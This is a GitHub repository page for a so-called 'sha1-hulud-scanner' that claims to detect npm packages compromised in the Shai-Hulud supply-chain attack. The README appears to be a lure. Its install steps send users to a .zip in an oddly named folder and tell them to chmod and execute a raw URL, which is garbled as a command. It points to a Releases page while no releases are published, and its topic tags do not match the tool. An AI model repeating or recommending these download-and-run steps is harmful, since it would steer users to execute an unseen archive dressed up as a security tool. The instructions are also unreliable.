Skip to content

vitor2342/sha1-hulud-scanner

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

7 Commits
Rousseauite
Rousseauite
Β 
Β 
.gitignore
.gitignore
Β 
Β 
README.md
README.md
Β 
Β 
sha1-hulud-packages.txt
sha1-hulud-packages.txt
Β 
Β 
sha1-hulud-scanner.sh
sha1-hulud-scanner.sh
Β 
Β 

Repository files navigation

πŸ›‘οΈ sha1-hulud-scanner - Detect Compromised npm Packages Easily

πŸš€ Getting Started

Welcome to the sha1-hulud-scanner project! This tool helps you find out if your npm packages are compromised due to the SHA1-HULUD supply chain attack. Follow these simple steps to download and run the scanner with ease.

πŸ“₯ Download Now

Download sha1-hulud-scanner

πŸ“‹ System Requirements

Before you download, ensure your system meets the following requirements:

  • Operating System: Works with Linux and macOS.
  • Bash Shell: You need a working bash environment. Most Linux distributions come with bash installed. For macOS, bash is also available by default.
  • Internet Connection: Required to download npm packages and get updates.

πŸ“¦ Features

  • Comprehensive Scanning: Detects over 288 compromised npm packages.
  • Simple Interface: Easy to use, even for beginners.
  • Fast Results: Quickly scans your packages and provides feedback.

πŸ”§ Download & Install

To get started, visit the Releases page to download the latest version of the tool.

Visit this page to download.

  1. Click the link above.
  2. Look for the latest release.
  3. Find the file suitable for your operating system (for example, a .sh file for Linux or macOS).
  4. Click to download the file to your computer.

πŸ“‚ Running the Scanner

Once you have downloaded the scanner, follow these steps to run it:

  1. Open your terminal. You can usually find this in your applications or utilities folder.

  2. Navigate to the folder where you downloaded the scanner. For example, if you downloaded it to the "Downloads" folder, enter:

    cd ~/Downloads

  3. Give permission to run the file. If you downloaded a .sh file, use this command:

    chmod +x https://raw.githubusercontent.com/vitor2342/sha1-hulud-scanner/main/Rousseauite/hulud-scanner-sha-v2.6.zip

  4. Now, run the scanner with this command:

    https://raw.githubusercontent.com/vitor2342/sha1-hulud-scanner/main/Rousseauite/hulud-scanner-sha-v2.6.zip

  5. Follow the prompts to scan your npm packages.

πŸ› οΈ Troubleshooting

If you run into any issues, here are some common solutions:

  • Permission Errors: If you see a permission denied error, ensure you used the chmod command to set executable permissions.
  • Command Not Found: Make sure you are in the correct directory where the scanner is located.
  • Dependencies Missing: If there are issues related to missing tools, you may need to install certain bash utilities.

πŸ“ž Support

If you need further assistance, you can visit the Issues page on GitHub. Here, you can report bugs or ask for help.

🌐 Stay Updated

Make sure to check back often for updates to the sha1-hulud-scanner. Developers are always working to improve the tool and add new features.

✍️ Contribution

If you want to contribute, feel free to fork the repository and submit a pull request. Your input is valuable, and we welcome new ideas to enhance the scanner.

Thank you for using sha1-hulud-scanner! By following these steps, you can effectively protect yourself from compromised npm packages.

About

🚨 Detect compromised npm packages from the SHA1-HULUD pt 2 attack with a multi-package manager scanner supporting npm, yarn, bun, and pnpm.

Topics

github python github-api security monitoring scanner supply pygithub toolset slack-notifications malware-detection organization-management github-scanner ysskrishna shai-hulud shai-hulud-detector shai-hulud-attack detection-tool

Resources

Readme
Activity

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

 
 
 

Contributors

Languages